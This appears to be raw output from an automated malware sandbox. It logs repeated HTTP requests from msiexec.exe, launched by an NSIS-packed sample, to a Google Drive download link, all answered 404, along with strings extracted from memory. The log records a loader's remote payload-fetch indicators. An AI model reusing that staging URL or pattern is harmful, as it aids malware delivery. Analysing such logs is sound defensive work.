      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSysRu5KF3RVhiRXum-nfitiOdkd_DC9DlgriVCB05EkAQ5SrmycMYxvWgxD73El7OtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:16:25 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-8eseIcruGEYXAuyAZLR0Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF; expires=Sun, 13-Jul-2025 02:16:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRvT9mHj3kKh3yOo4ARF13a2rl1FrFMmtg7OiCptatpD_Q9e18m4Z0l6gjLkz28AlV8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:16:37 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-GYrO8KJLBtnt-XWml0kUSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQJsJP4HIfh8VmylOITWQR-tXwvdu4WZ_6AcYemKKiSrVne1jAR3sMlb9uvhgO_ulHym5ABbqoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:16:49 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-RlzvpBrcXwbJUworh8gXKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ3agUmCM9JZICkn4pJws8Ev7BrqSR2KSom0yDjNL8oDqghUv-kWtBI7Mj62Z0Lw4z8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:17:02 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Xv7S192T1-S8oCLgKsDWzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ5Ney-zTAkv6b3pgTGAZm36mboMJdw9GvNvXOMOMOKhBBSTBmo4WKTtBUqj1w7XPM7CliKTvMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:17:14 GMTContent-Security-Policy: script-src 'nonce-I3Kk_NToIGgyUM-oltRevg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTHGMtJuoia5ZCrAByg70tFb8agvP-LqcfDD4bLZc5x5M5NLoMgN6efpyVPh8LMaDeTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:17:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-KoHzYevoGocFH0Az5YFqwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRHqp08SDusrAvxzqPEugMM44tLvkHeOB6QXbgYrY_BQ91REBLvE_JtalOvp3-7mvszGS5bfmIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:17:38 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-8g1PnmWGX8s8lkJTF921_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ggt55otF4mvHeChavS71h3yqN2Xgewg4rrAnjhlN1_xAhXXRC_6SeFSi76ksB3HQoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:17:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-iT7cvJbWC2iwlVj_fhVb4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSaxhjjy_9QviH_6eZx1RuSqAAejoRu1NhOlsq0am4EtRK7PDLeoe09t7XP5L6ezp1JContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:18:02 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-6AUEKOB3XJEx_fANsmefXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: ro7eoySJ9q.exe, 00000000.00000000.2075821617.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ro7eoySJ9q.exe, 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2692845690.0000000005589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.c
      Source: msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934010910.00000000094F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2692845690.0000000005589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2692845690.0000000005589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2692845690.0000000005589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.go
      Source: msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/W
      Source: msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2965886628.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/g
      Source: msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B
      Source: msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B)I
      Source: msiexec.exe, 00000006.00000003.3209397332.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B0
      Source: msiexec.exe, 00000006.00000003.3209397332.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B1
      Source: msiexec.exe, 00000006.00000003.3209397332.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2965886628.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B5I3?
